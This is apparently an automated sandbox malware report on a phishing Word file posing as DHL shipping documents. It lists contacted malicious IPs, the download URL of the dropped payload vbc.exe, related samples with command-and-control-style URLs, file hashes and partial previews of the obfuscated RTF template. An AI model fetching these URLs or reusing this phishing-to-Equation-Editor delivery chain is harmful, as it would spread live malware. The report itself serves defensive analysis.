http://www.google.si/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmp	false		high
http://search.espn.go.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.myspace.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://p.zhongsou.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://service2.bfast.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	explorer.exe, 0000000D.00000000.2114059517.0000000001C70000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
213.186.33.5	www.nevomo.group	France		16276	OVHFR	true
23.95.122.24	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383965
Start date:	08.04.2021
Start time:	13:17:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DHL Shipping doc & Shipment tracking details.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOCX@9/22@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 26.3% (good quality ratio 25%) Quality average: 71.3% Quality standard deviation: 29.1%
HCA Information:	Successful, ratio: 95% Number of executed functions: 81 Number of non-executed functions: 35
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .docx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:17:46	API Interceptor	50x Sleep call for process: EQNEDT32.EXE modified
13:17:51	API Interceptor	30x Sleep call for process: vbc.exe modified
13:18:09	API Interceptor	119x Sleep call for process: NETSTAT.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
213.186.33.5	Calt7BoW2a.exe	Get hash	malicious	Browse	www.del-tekzen.com/evpn/?kzrxPDG=v3ZDcR7pjvwz1UjDln28kRDl7qvPbzZbdIYAmpXghlqnmfKnmXU7bNFueyL53HtQM86r&Dxoxa=ZRmh28X82b
	BL COPY.exe	Get hash	malicious	Browse	www.virtualgameserver.online/fhg5/?pP=yhsMnPIgKAgSN0C7rwvDRQKlJvS3c/rOZmkKDD7m5ipCRTfv9wdvKbNSQq6f80HhK9RH&SZ=V48Di0dp
	Bista_094924,ppdf.exe	Get hash	malicious	Browse	www.fenuadiscovery.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=9eTDkTWyy1LvbcWHsrMwtg9XDXQm4MjxGnuAfXrpN6dOXNNyfq+SoXeUTDRT2cFthWfH
	New Order.xlsx	Get hash	malicious	Browse	www.del-tekzen.com/evpn/?qDH4D=f8c0xBrPYP1xE&RB=v3ZDcR7sjow31EvPnn28kRDl7qvPbzZbdIAQ6qLhlFqmmumhhHF3NJ9sdUH/825bZaOcAw==
	534ucFq00y.exe	Get hash	malicious	Browse	www.dentiste-rosendael.com/cyna/?1bF=0wNfzcvtTLbyTsFLpaYCZGKXT18a9oHn1zO7VtfN//Ho3ZumP714MnomXIWndNeW/5Bz&8p=XjilpT
	AVRJERqIh4.exe	Get hash	malicious	Browse	www.del-tekzen.com/evpn/?FPWh=CdQDm&CX94E=v3ZDcR7pjvwz1UjDln28kRDl7qvPbzZbdIYAmpXghlqnmfKnmXU7bNFueyL53HtQM86r
	bank details.exe	Get hash	malicious	Browse	www.mes-produits-frais.com/n30n/?ofl4i=rwLv+H9X8x37/58qpLrfST289Q33IzEUoaVwkxfg51+Avi746P7Wrqy04kgzsNNpeaaDjOFhxw==&1bj=3fb4MJahNHJTdZ
	FYI AWB Shipping documents 7765877546 PDF.exe	Get hash	malicious	Browse	www.workgar.com/b8k8/?U4zx=Mj_P3FUxqTbPUBh0&uVg0=efy/CgdJP5vbH5TIjeBVc6kgapM61W+3+JPD6tMY+y6k9NWdAnw0pDdthMlH3/QTxVcNSuUkig==
	Proforma inv.doc	Get hash	malicious	Browse	www.drawingscreen.com/amis/?cf=/m9tfs7psy/QL8RAFvVc7QIdiVqcP4ULW4r7kXDsv/L6p1Mv1rokCr5BJ/YbRIle+x7qbg==&nnLx=TBZx3bgXCBwXGB
	#U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exe	Get hash	malicious	Browse	www.meteoannecy.net/n7ak/
	dwg.exe	Get hash	malicious	Browse	www.ancientastronauts.digital/ripw/?GVJ=eEnLuBKHT9fzcG2+RdbQQuZ4lwgRdUvKXW6RMtp8Z2vtfHPPjxhmS0qvsGhGHRv8rfYX&2d=Yl9lnt4hzrh
	Additional DHL shipment Delivery Parcel.exe	Get hash	malicious	Browse	www.underdessous.com/nehc/?Jzu8ZXYx=1WKmeA4sUIsT0NVnqSDBz/otVnAnOZ+pTAVUydYAkzcImvHo1q7b4gKYttlnraGpmrpF&D4f8=fRmXCLc0WnbXAL
	PO_210222.exe	Get hash	malicious	Browse	www.informationnelchamanique.com/dka/?9rYD4D2P=4HtZzIKAOO04Nbq7ChYDUmvNK9qFGjj/E+l1FCmjHEZoiatGj/Rzkf35LDgpsY3kAv6U&4h=vTxdADNprBU8ur
	P.O 5282.exe	Get hash	malicious	Browse	www.claviersenpoitou.ovh/qbeg/?3f0x=hq4St0hniDEdh5A1hCP6yg5Uw6wQZtBkeClthAZB4kGHHLho9iYtQkzO+hgpsE3ThFDLG/hd2w==&Gzux=WB08lHWHB
	Hxkidwv66m.exe	Get hash	malicious	Browse	www.medaye.com/nz8/?ytCXpRW=d77EvwG7/oxjkuuNJtUx1ifNrvp12ahygBcWaI7ocQTc/geaKHfCOjIiL6M9rMdvgUv+&BnY=3f2D_X6XXfQt_Rq0
	Shipping Documents CMA CGM COAU7014424560.xlsx	Get hash	malicious	Browse	www.biomig.net/oean/?SdR=XgOOq6QoKYAMTxb2HPp7s1bJKMN7SvZCJ+ljzv9K68iz1Bzd2f3uX76noL+7DFRgi0fqjQ==&cF=Z4885L6Hr
	inquiry 19117030P.xlsx	Get hash	malicious	Browse	www.egio.digital/eaud/?8paxn=Cp9jocdlCZczMoTMM20vFv0IbEktNH3clJX184rGXLu/hCvDkmg6W0ZY4gTpqIb2jslblg==&jpal0=x8-tbNXpZtBPQx
	CREDIT NOTE DEBIT NOTE 30.1.2021.xlsx	Get hash	malicious	Browse	www.casinocerto.com/eaud/?t2M8bRGP=SyqGIieUJsGJGI6NcFx7ImJJb+0PxKIK5sSUsUukqPXS0WL6I+iBykXhU443H635ii7M3w==&efipT=8pD4qrqpF2f
	MV QU SHAN HAI.xlsx	Get hash	malicious	Browse	www.casinocerto.com/eaud/?lt=ZPm4&TBv=SyqGIieUJsGJGI6NcFx7ImJJb+0PxKIK5sSUsUukqPXS0WL6I+iBykXhU443H635ii7M3w==
	orden pdf.exe	Get hash	malicious	Browse	www.meteoannecy.net/n7ak/?QL3=Y6zPC1HmhVQSD93sTKgbkopj8PghKJAFBa45kph3GFqsoki/+nnDqTMjg+eVW+0o8B1zUBl5Ww==&vDKd7=XRiPw2ZpQdf
23.95.122.24	dot.dot	Get hash	malicious	Browse	23.95.122.24/zyo/vbc.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	CWlXbVUJab.exe	Get hash	malicious	Browse	149.56.235.225
	IMG_102-05_78_6.doc	Get hash	malicious	Browse	149.56.235.225
	Calt7BoW2a.exe	Get hash	malicious	Browse	213.186.33.5
	8sxgohtHjM.exe	Get hash	malicious	Browse	91.121.60.23
	C7SRTTLgsn.exe	Get hash	malicious	Browse	54.36.27.31
	ApuE9QrdQxe7Um6.exe	Get hash	malicious	Browse	66.70.204.222
	YReGeOs683XKMn4.exe	Get hash	malicious	Browse	51.195.53.221
	LCSXS44U22.exe	Get hash	malicious	Browse	54.36.27.31
	Ewkoo9igCN.dll	Get hash	malicious	Browse	51.91.76.89
	49Bvnq7iFK.dll	Get hash	malicious	Browse	51.91.76.89
	OtOXfybCmW.dll	Get hash	malicious	Browse	51.91.76.89
	Ewkoo9igCN.dll	Get hash	malicious	Browse	51.91.76.89
	W3aLwWHvWB.dll	Get hash	malicious	Browse	51.91.76.89
	IJh1SAcSNP.dll	Get hash	malicious	Browse	51.91.76.89
	OtOXfybCmW.dll	Get hash	malicious	Browse	51.91.76.89
	afC9TbiOWl.dll	Get hash	malicious	Browse	51.91.76.89
	wABiemJeyB.dll	Get hash	malicious	Browse	51.91.76.89
	I316Yh2noM.dll	Get hash	malicious	Browse	51.91.76.89
	W3aLwWHvWB.dll	Get hash	malicious	Browse	51.91.76.89
	IJh1SAcSNP.dll	Get hash	malicious	Browse	51.91.76.89
AS-COLOCROSSINGUS	dot.dot	Get hash	malicious	Browse	23.95.122.24
	New Order for April#89032.xlsx	Get hash	malicious	Browse	198.23.174.104
	PO PR 111500976.xlsx	Get hash	malicious	Browse	198.23.213.61
	Revised Proforma.xlsx	Get hash	malicious	Browse	198.23.207.115
	7yTix20XaT.rtf	Get hash	malicious	Browse	198.23.251.121
	Inquiry.docx	Get hash	malicious	Browse	198.23.251.121
	order1562.docx	Get hash	malicious	Browse	198.23.251.121
	order1562.docx	Get hash	malicious	Browse	198.23.251.121
	lF5VYmf6Tm.exe	Get hash	malicious	Browse	192.3.26.107
	P.O_RFQ0098765434.xlsx	Get hash	malicious	Browse	198.46.132.132
	Payment Proof.xlsx	Get hash	malicious	Browse	198.23.174.104
	0f0mccRNrP.exe	Get hash	malicious	Browse	192.3.26.107
	R6G6EFOeOE.rtf	Get hash	malicious	Browse	198.23.251.121
	NEW ORDER PO.xlsx	Get hash	malicious	Browse	198.23.213.57
	uIIHdM0MHt.rtf	Get hash	malicious	Browse	198.23.174.104
	New purchase Order_Invoice payment info and shipping documents.docx	Get hash	malicious	Browse	198.23.251.121
	SecuriteInfo.com.Packed-GDKD3066D931944.20107.exe	Get hash	malicious	Browse	192.3.26.107
	SecuriteInfo.com.W32.AIDetect.malware1.1169.exe	Get hash	malicious	Browse	192.3.26.107
	4i1GUIgglX.exe	Get hash	malicious	Browse	192.210.198.12
	ACCOUNT SETTLED 32535365460.docx	Get hash	malicious	Browse	107.173.219.80

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	dot.dot	Get hash	malicious	Browse
C:\Users\Public\vbc.exe	dot.dot	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	144008
Entropy (8bit):	0.3098262771776558
Encrypted:	false
SSDEEP:	96:KaBdAQUpUw4Qn8apiKrSBrTTJDBJRuv9Dzz3DaDPDv9Dzz3DaDPaR270hE3xvA:hjAQUpn4QnTUVKIq3K
MD5:	6DB8CD96B4C85B119FD1C5B854A23016
SHA1:	74E2EFBB0C5EC24C8945BBDACE3C1F37433E2763
SHA-256:	E2B7AF33C81B0725788BEE74791BF3C3AB509659FF1B4FB24EB606AF885B63D8
SHA-512:	FF6669D646F42FB0D1008A0E5378CBA7460588CEE1CCFE68DF9DEFC4883AF5295C7F6B69BB86895AC38EEEB44C65D1501DE94788C8977F53632EBC8C3C49FA98
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.]c..X.L.u!..=Q.S,...X.F...Fa.q..............................}\|.#.H..).3/.............(O.EB.\|..ZqIE....................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{BBF4E4AC-D3FE-4235-914F-E64626B221A9}.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	156816
Entropy (8bit):	0.6596008829655113
Encrypted:	false
SSDEEP:	96:K4H1V9UGUUP80UP6RYy0u7YFwQ5enwJJloT+DV9yHrnj9ZLRNM0pgSKTgSK+mniv:Act7SjKSorMIuUiKpw
MD5:	F9C192CF1A2AA18A2EEF25F8D00AA502
SHA1:	6334110BACAA7F22FDF3F1B89E49A3B0449615D8
SHA-256:	E81EF857EC9E51A8864218C434827A17B0F5ED7C0DBFEB5D19EDE33F5BB33518
SHA-512:	1FDBA5629C084ED5E05B62830DC1559F4F80935429B3100BD63C84F554AFFF5BD15A5DD39E88456F73A88E001DC31D17C71DD812C08E6AE958ABB85F991D0CF5
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.x/.A.@J...\|C5<.S,...X.F...Fa.q............................X.m<!,^C..}.N..C........,...Z.O.o+.........................................................................t...t...t...t..............................................................................................................................................................................................................................................................................................................................$hg~E.m...4&.........,...Z.O.o+.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	133
Entropy (8bit):	4.228766108684801
Encrypted:	false
SSDEEP:	3:yVlgQPDRlgsRlz4RHWzij6SlLM3lNLLh3plU+lFZ276:yPdPDDblz4RHWpSq3lNe+J22
MD5:	8E89C48D746C11FEA804C52D0881BDAA
SHA1:	216261EE5B07A5701F888EBF3485A1B2668B114A
SHA-256:	25F668C71F47BA804180E2BF2CB3812D662AE9D1CC3451D56C7C40047D700AC9
SHA-512:	F4321234AC52771ECF5B58C1E15D1B35CBBB09E13F8B1EBA31B4CA1426AB1196A4DBECE6DA09A46EB6A5DC483F588B8AD931C85A4BFB17CEE5D0A6111B6792EA
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q.....H..@....b..q....]F.S.D.-.{.B.B.F.4.E.4.A.C.-.D.3.F.E.-.4.2.3.5.-.9.1.4.F.-.E.6.4.6.2.6.B.2.2.1.A.9.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	144008
Entropy (8bit):	0.305976323984198
Encrypted:	false
SSDEEP:	384:34VtM56CKjqUxUpK4IAYqqUxUpK4IAYX5m1kt:oqTq
MD5:	C1A68D7886D4521B3D0A82B54BC64BD3
SHA1:	57BCE888FB80B07B86F079E60711BE21195CAA44
SHA-256:	07389D13244E78927034E12F50F65215243278CEF49AA0B5D920668CD7DD421D
SHA-512:	12ACDAA755ACBC9D5B5A787083F48E541DA0420CFCE17318919515494F1ADD4F363063278B1D6E578A9E8D986ADF7C0A3CECBBC8EEBAB5D5AFE6354940010036
Malicious:	false
Reputation:	low
Preview:	......M.eFy...zb...mOTO...0O...S,...X.F...Fa.q.............................xl...G.B."*.............j....J....,.......................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0FF8CE56-196E-41FE-8549-99098D12EE98}.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	149973
Entropy (8bit):	0.2784291666095703
Encrypted:	false
SSDEEP:	48:I3s8BPwNoUYT9ja3f9jVYq8VGotRP008NnHgJR2Mh5uGZ:KsiBJ8B1mZ58
MD5:	B18103AA0D6EEA8856232FC898D97E5E
SHA1:	26402AF85EDC2D27C35AD596062221F59F36C5FD
SHA-256:	9D1E3BBC512969B394953AFC777FD57E9623505811F4F68D0AAF9B131A392AC7
SHA-512:	1B2C0112AB71BD54CB16DE9632528801D7D1E41A0436E24F335A01C4DFCEB2767EF795A79381F79D25260762F32B367FA03F5CF49EBB93A07EED6071846EAC6B
Malicious:	false
Reputation:	low
Preview:	......M.eFy...zM.[..2.D.0.G../.S,...X.F...Fa.q............................N...]Z,@................=yfB.G..C+.P.....................................................................t...t...t...t...........................................................................................................................................................................................................................................................................................................................]..u...L..}..............=yfB.G..C+.P.................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	133
Entropy (8bit):	4.183653326729914
Encrypted:	false
SSDEEP:	3:yVlgQPDRlgsRlz0OwpIOAhOkSlwAYczlygCf276:yPdPDDblz0tmOFkS7JygK22
MD5:	2F501DC5F7800E311E86D84AAE819491
SHA1:	2CF0729178CC544847F42195AB8AC122FADCABD2
SHA-256:	1B594DE9AE52DF312BB9D8329B9F01594342B75A2CD49CB0156F58A5C7D2B19E
SHA-512:	3EED54E9C9E369F1C0A30B2929A003527E114DCAEE7C538133A59737B5EA4A0CDAFEAE26BF1E9A4DCA52594CBB06A8E2D74B1D1ECCCBC948131ED39E11CB7C79
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q.....H..@....b..q....]F.S.D.-.{.0.F.F.8.C.E.5.6.-.1.9.6.E.-.4.1.F.E.-.8.5.4.9.-.9.9.0.9.8.D.1.2.E.E.9.8.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	387072
Entropy (8bit):	6.9572597315329805
Encrypted:	false
SSDEEP:	6144:1wpTcyLItYxn3QDQN/rismCZyxB7HZ7g+xsoyEnGYgGI:1wpTd063QDQNSCZQB757txnG5l
MD5:	29E8627D7B80C21FC98C82314F3DF5E2
SHA1:	22817310A3108CED7EC26488E1E2D3D2F8C32018
SHA-256:	98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
SHA-512:	67DA772472FEA7587503C674CC7695D24D6A9B777FD3FB41090058730F65BDF55C7F5CF619EF8A6C2EBB0F03A5FF4DDD81A5846A40D307C711D9B71F72F20525
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:	Filename: dot.dot, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	http://23.95.122.24/zyo/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......^............................A............@................................6...................................g.......<.... ...,...................P......................................X...@...........................................text...c........................... ..`.data..............................@....fipuh..............................@....wuta...y...........................@....new.....I......J..................@..@.rsrc....,... ......................@..@.reloc.......P.......L..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z1MU4GXL.dot Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, unknown version
Category:	downloaded
Size (bytes):	12899
Entropy (8bit):	5.628188977802884
Encrypted:	false
SSDEEP:	384:CrbzX8txvSYHKdnddR6DJlNmBjL0ztbQ3om:uH8bKdlkJlNmBjatO
MD5:	40F03856876FDA8B3BDA880D1D5A4636
SHA1:	D252C054154C5524DFBF3F3238B32F711290FD36
SHA-256:	A4358B898C41852211EE727E4B8C0D05301BF4C6A90A4780C5A6F8B1B1CF5C81
SHA-512:	559A93F09A07A3AA13FFCE038EF2D47A1B73EF6301FD2799A9B3CAE99B3E7B652E65951A318CBE7BC31AE25FFEB05C644B08F306553EC9C70B4E60794E1E6687
Malicious:	false
IE Cache URL:	http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot
Preview:	{\rtf3157&?^:499?9%.74&.0~.;@?!.?>.~'6:#._<.(8)-?/:]@6!4'``9.($4\|'%;!!6\|5?9.<@:;+[^~#%'\|^?..]5=%77^:_<3/5?>~:</82;>.?>?5<?``_\|~.>>?@2'_%1:?3$?#$74#+8?@?7!3?;?4?\|,,?;//)#%&..\|%?02>9>\|._4,/&]9?&1-!..\|0&.@?.88?%%;;(3`8?[.+^4&29\|%5\|?1\|%=1]^+)([,-.?0^@)#:5?^'_?8[9?.?++-4!_9,.%..3;~?&$#;%=6+53~<.30\|4\|@7'/=:-4;>`':,%`0[?`1?-???+=:[??+6'?'<\|1?:4&;+>.^)\|\|%58=\|).4<.84</'%_93,@[;?70[?5%.;![.?:2~-6-%$?_?64[?=7/???<9.'2\|.3?[?2?;!75._?7?3,`'8-6??.6.).)'?1<=..]!%98-1?$70%?5?\|.6\|$=!=5!14$@'.%>][?163?)5+.56[=%479[.]`7':%.<?$-837\|=.`-.?3%?\|?)!6=^,5<=?\|[)>=%%~8../;!=~=?:])5>%9&$'!(2/2)[#@;8??$8^#?-<,@?=?<99.`8..5/4`!#@$@?-807-(??:..85'?`.?[~7%-/8<;&5#?323~<.>=8';??-8?0?3^??.~1.%4`.?$?%9.=;~57).^?$:)[.780-.?.8.1.>?%=[7#%8;`3;(03'.8#??9>9'#0-,+/=.%?&9-?+8~.1)'32?@;`~1?(2~%8[>^)?![%3/?)>?6#.;#?[;>.-?,<+29:=?_2%+3)5),).;92@/3)=>.+#.3\|%0.]3<!&[,~/69,?.?^0,~1.;,;^?%?%.1@_~@?-?99\|^19$#%\|#]:.737%]?%?+/)?[?%13..1%1.@%,'#;<(;![13>%!,3-.![%&']7:?65;33\|]<?0@:-.'2^&?-.</<'7?=@?$(^33]%0:2?.&_?!4<

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9585664.dot Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, unknown version
Category:	dropped
Size (bytes):	12899
Entropy (8bit):	5.628188977802884
Encrypted:	false
SSDEEP:	384:CrbzX8txvSYHKdnddR6DJlNmBjL0ztbQ3om:uH8bKdlkJlNmBjatO
MD5:	40F03856876FDA8B3BDA880D1D5A4636
SHA1:	D252C054154C5524DFBF3F3238B32F711290FD36
SHA-256:	A4358B898C41852211EE727E4B8C0D05301BF4C6A90A4780C5A6F8B1B1CF5C81
SHA-512:	559A93F09A07A3AA13FFCE038EF2D47A1B73EF6301FD2799A9B3CAE99B3E7B652E65951A318CBE7BC31AE25FFEB05C644B08F306553EC9C70B4E60794E1E6687
Malicious:	false
Preview:	{\rtf3157&?^:499?9%.74&.0~.;@?!.?>.~'6:#._<.(8)-?/:]@6!4'``9.($4\|'%;!!6\|5?9.<@:;+[^~#%'\|^?..]5=%77^:_<3/5?>~:</82;>.?>?5<?``_\|~.>>?@2'_%1:?3$?#$74#+8?@?7!3?;?4?\|,,?;//)#%&..\|%?02>9>\|._4,/&]9?&1-!..\|0&.@?.88?%%;;(3`8?[.+^4&29\|%5\|?1\|%=1]^+)([,-.?0^@)#:5?^'_?8[9?.?++-4!_9,.%..3;~?&$#;%=6+53~<.30\|4\|@7'/=:-4;>`':,%`0[?`1?-???+=:[??+6'?'<\|1?:4&;+>.^)\|\|%58=\|).4<.84</'%_93,@[;?70[?5%.;![.?:2~-6-%$?_?64[?=7/???<9.'2\|.3?[?2?;!75._?7?3,`'8-6??.6.).)'?1<=..]!%98-1?$70%?5?\|.6\|$=!=5!14$@'.%>][?163?)5+.56[=%479[.]`7':%.<?$-837\|=.`-.?3%?\|?)!6=^,5<=?\|[)>=%%~8../;!=~=?:])5>%9&$'!(2/2)[#@;8??$8^#?-<,@?=?<99.`8..5/4`!#@$@?-807-(??:..85'?`.?[~7%-/8<;&5#?323~<.>=8';??-8?0?3^??.~1.%4`.?$?%9.=;~57).^?$:)[.780-.?.8.1.>?%=[7#%8;`3;(03'.8#??9>9'#0-,+/=.%?&9-?+8~.1)'32?@;`~1?(2~%8[>^)?![%3/?)>?6#.;#?[;>.-?,<+29:=?_2%+3)5),).;92@/3)=>.+#.3\|%0.]3<!&[,~/69,?.?^0,~1.;,;^?%?%.1@_~@?-?99\|^19$#%\|#]:.737%]?%?+/)?[?%13..1%1.@%,'#;<(;![13>%!,3-.![%&']7:?65;33\|]<?0@:-.'2^&?-.</<'7?=@?$(^33]%0:2?.&_?!4<

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0863C5D3-5908-4917-8FD7-8909E0160183}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	dBase III DBT, version number 0, next free block index 7536653
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.10581667566270775
Encrypted:	false
SSDEEP:	3:Ghl/dlYdn:Gh2n
MD5:	28ADF62789FD86C3D04877B2D607E000
SHA1:	A62F70A7B17863E69759A6720E75FC80E12B46E6
SHA-256:	0877A3FC43A5F341429A26010BA4004162FA051783B31B8DD8056ECA046CF9E2
SHA-512:	15C01B4AD2E173BAF8BF0FAE7455B4284267005E6E5302640AA8056075742E9B8A2004B8EB6200AA68564C40A2596C7600D426619A2AC832C64DB703A7F0360D
Malicious:	false
